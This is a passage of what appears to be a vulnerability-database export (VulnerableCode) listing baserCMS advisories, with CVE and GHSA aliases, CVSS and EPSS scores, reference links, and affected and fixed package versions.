vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1
2
url pkg:composer/baserproject/basercms@4.0.6
purl pkg:composer/baserproject/basercms@4.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6
aliases CVE-2017-10842, GHSA-jc94-wp59-pq4f
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ffq1-r9ck-1bhp
18
url VCID-g56w-z9cx-5ygv
vulnerability_id VCID-g56w-z9cx-5ygv
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
reference_id
reference_type
scores
0
value 0.0055
scoring_system epss
scoring_elements 0.68361
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
1
reference_url https://basercms.net/security/JVN_45547161
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://basercms.net/security/JVN_45547161
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
6
reference_url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0-beta1
purl pkg:composer/baserproject/basercms@5.0.0-beta1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1
aliases CVE-2023-29009, GHSA-8vqx-prq4-rqrq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv
19
url VCID-ga9u-uv9b-tydr
vulnerability_id VCID-ga9u-uv9b-tydr
summary 
Cross-site Scripting
Cross-site scripting vulnerability in baserCMS allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0570
reference_id
reference_type
scores
0
value 0.00195
scoring_system epss
scoring_elements 0.4131
published_at 2026-06-05T12:55:00Z
1
value 0.00195
scoring_system epss
scoring_elements 0.41234
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0570
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0570
reference_id CVE-2018-0570
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0570
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0570, GHSA-994g-74gq-5qpr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ga9u-uv9b-tydr
20
url VCID-ggv8-3v9t-mfea
vulnerability_id VCID-ggv8-3v9t-mfea
summary 
baserCMS Cross-site Scripting vulnerability in Site search Feature
There is a XSS Vulnerability in Site search Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
reference_id
reference_type
scores
0
value 0.00622
scoring_system epss
scoring_elements 0.70549
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
reference_id CVE-2023-44379
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
5
reference_url https://github.com/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-66c2-p8rh-qx87
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-44379, GHSA-66c2-p8rh-qx87
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea
21
url VCID-gsg3-fdmu-vqag
vulnerability_id VCID-gsg3-fdmu-vqag
summary 
Improper Input Validation
baserCMS allows remote attackers to execute arbitrary PHP code via the `admin/theme_configs/form`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-18942
reference_id
reference_type
scores
0
value 0.00928
scoring_system epss
scoring_elements 0.76457
published_at 2026-06-04T12:55:00Z
1
value 0.00928
scoring_system epss
scoring_elements 0.76486
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-18942
1
reference_url https://basercms.net/release/4_1_4
reference_id
reference_type
scores
url https://basercms.net/release/4_1_4
2
reference_url https://github.com/baserproject/basercms/issues/959
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/issues/959
3
reference_url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
4
reference_url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
5
reference_url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/
reference_id
reference_type
scores
url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-18942
reference_id CVE-2018-18942
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-18942
7
reference_url https://github.com/advisories/GHSA-rjc2-x53r-6c9r
reference_id GHSA-rjc2-x53r-6c9r
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rjc2-x53r-6c9r
fixed_packages
0
url pkg:composer/baserproject/basercms@4.1.4
purl pkg:composer/baserproject/basercms@4.1.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-d5gk-q2hh-kba5
11
vulnerability VCID-eq7f-n3g5-s3hu
12
vulnerability VCID-g56w-z9cx-5ygv
13
vulnerability VCID-ggv8-3v9t-mfea
14
vulnerability VCID-hpk4-a6tr-3ffe
15
vulnerability VCID-j37y-gws9-ake9
16
vulnerability VCID-jby7-s5ez-dqb3
17
vulnerability VCID-k575-suuf-7bhf
18
vulnerability VCID-k5qv-4yp3-zbgf
19
vulnerability VCID-khft-xvrw-g3dr
20
vulnerability VCID-kmpp-6j49-pqfz
21
vulnerability VCID-mfm9-gsh3-ubg8
22
vulnerability VCID-nxrf-64er-xbfx
23
vulnerability VCID-p695-t9ye-v3ga
24
vulnerability VCID-p6nr-eu91-53b4
25
vulnerability VCID-pd8c-9d7z-zkhg
26
vulnerability VCID-sqr4-v889-tff8
27
vulnerability VCID-twf5-bzba-gqb4
28
vulnerability VCID-u16w-rbuk-ybfs
29
vulnerability VCID-uedz-j2vn-cbea
30
vulnerability VCID-vqx2-hzju-r7et
31
vulnerability VCID-wvnk-63hy-ykeq
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-xxud-7jsh-bbc1
34
vulnerability VCID-y2sz-c6vb-pkdp
35
vulnerability VCID-zqd4-rdem-jfgk
36
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4
aliases CVE-2018-18942, GHSA-rjc2-x53r-6c9r
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gsg3-fdmu-vqag
22
url VCID-guvm-x5jc-mfgc
vulnerability_id VCID-guvm-x5jc-mfgc
summary 
Path Traversal
baserCMS allows remote attackers to delete arbitrary files via unspecified vectors when the "File" field is being used in the mail form.
references
0
reference_url http://jvn.jp/en/jp/JVN78151490/index.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN78151490/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10843
reference_id
reference_type
scores
0
value 0.0057
scoring_system epss
scoring_elements 0.69014
published_at 2026-06-05T12:55:00Z
1
value 0.0057
scoring_system epss
scoring_elements 0.68975
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10843
2
reference_url https://basercms.net/security/JVN78151490
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN78151490
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10843
reference_id CVE-2017-10843
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10843
4
reference_url https://github.com/advisories/GHSA-x73x-7gmx-w835
reference_id GHSA-x73x-7gmx-w835
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x73x-7gmx-w835
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.15
purl pkg:composer/baserproject/basercms@3.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-u16w-rbuk-ybfs
35
vulnerability VCID-uedz-j2vn-cbea
36
vulnerability VCID-vqx2-hzju-r7et
37
vulnerability VCID-xpsb-2yux-g3cf
38
vulnerability VCID-y2sz-c6vb-pkdp
39
vulnerability VCID-yesf-qxgy-3ygx
40
vulnerability VCID-zqd4-rdem-jfgk
41
vulnerability VCID-zsgc-fnen-b7a6
42
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.15
1
url pkg:composer/baserproject/basercms@4.0.5.1
purl pkg:composer/baserproject/basercms@4.0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
